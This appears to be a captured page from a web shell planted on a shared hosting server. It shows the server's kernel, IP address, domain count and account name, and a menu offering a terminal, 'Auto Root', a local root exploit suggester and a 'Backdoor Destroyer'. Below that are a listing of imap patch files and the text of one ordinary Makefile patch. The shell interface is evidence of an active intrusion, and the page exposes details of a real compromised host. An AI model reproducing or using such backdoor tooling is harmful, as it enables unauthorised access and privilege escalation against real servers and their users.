Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.26
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
apps /
lib /
imap /
supplemental /
patches /
Delete
Unzip
Name
Size
Permission
Date
Action
1006_openssl1.1_autoverify.patch
2.15
KB
-rw-r--r--
2023-01-11 06:22
README.md
325
B
-rw-r--r--
2023-01-11 06:22
imap-2004a-doc.patch
885
B
-rw-r--r--
2023-01-11 06:22
imap-2007-paths.patch
614
B
-rw-r--r--
2023-01-11 06:22
imap-2007e-authmd5.patch
1.61
KB
-rw-r--r--
2023-01-11 06:22
imap-2007e-overflow.patch
721
B
-rw-r--r--
2023-01-11 06:22
imap-2007e-poll.patch
7.5
KB
-rw-r--r--
2023-01-11 06:22
imap-2007e-shared.patch
2.56
KB
-rw-r--r--
2023-01-11 06:22
imap-2007e-system_c_client.patch
728
B
-rw-r--r--
2023-01-11 06:22
imap-2007f-format-security.patch
680
B
-rw-r--r--
2023-01-11 06:22
imap-2007f-ldflags.patch
964
B
-rw-r--r--
2023-01-11 06:22
Save
Rename
diff -up imap-2007f/src/osdep/unix/Makefile.ldflags imap-2007f/src/osdep/unix/Makefile --- imap-2007f/src/osdep/unix/Makefile.ldflags 2018-04-24 13:18:45.333043626 +0200 +++ imap-2007f/src/osdep/unix/Makefile 2018-04-24 13:29:09.262125281 +0200 @@ -73,7 +73,7 @@ SSLRSA= # -lRSAglue -lrsaref SSLCFLAGS= -I$(SSLINCLUDE) -I$(SSLINCLUDE)/openssl\ -DSSL_CERT_DIRECTORY=\"$(SSLCERTS)\" -DSSL_KEY_DIRECTORY=\"$(SSLKEYS)\" -SSLLDFLAGS= -L$(SSLLIB) -lssl $(SSLCRYPTO) $(SSLRSA) +SSLLDFLAGS= -L$(SSLLIB) -lssl $(SSLCRYPTO) $(SSLRSA) $(EXTRALDFLAGS) # Extended flags needed for non-standard passwd types. You may need to modify. @@ -502,7 +502,7 @@ lnp: # Linux Pluggable Authentication mo ACTIVEFILE=/var/lib/news/active \ RSHPATH=/usr/bin/rsh \ BASECFLAGS="$(GCCCFLAGS)" \ - BASELDFLAGS="$(PAMLDFLAGS)" + BASELDFLAGS="$(EXTRALDFLAGS) $(PAMLDFLAGS)" lnx: # Linux non-shadow passwords @echo You are building for traditional Linux *without* shadow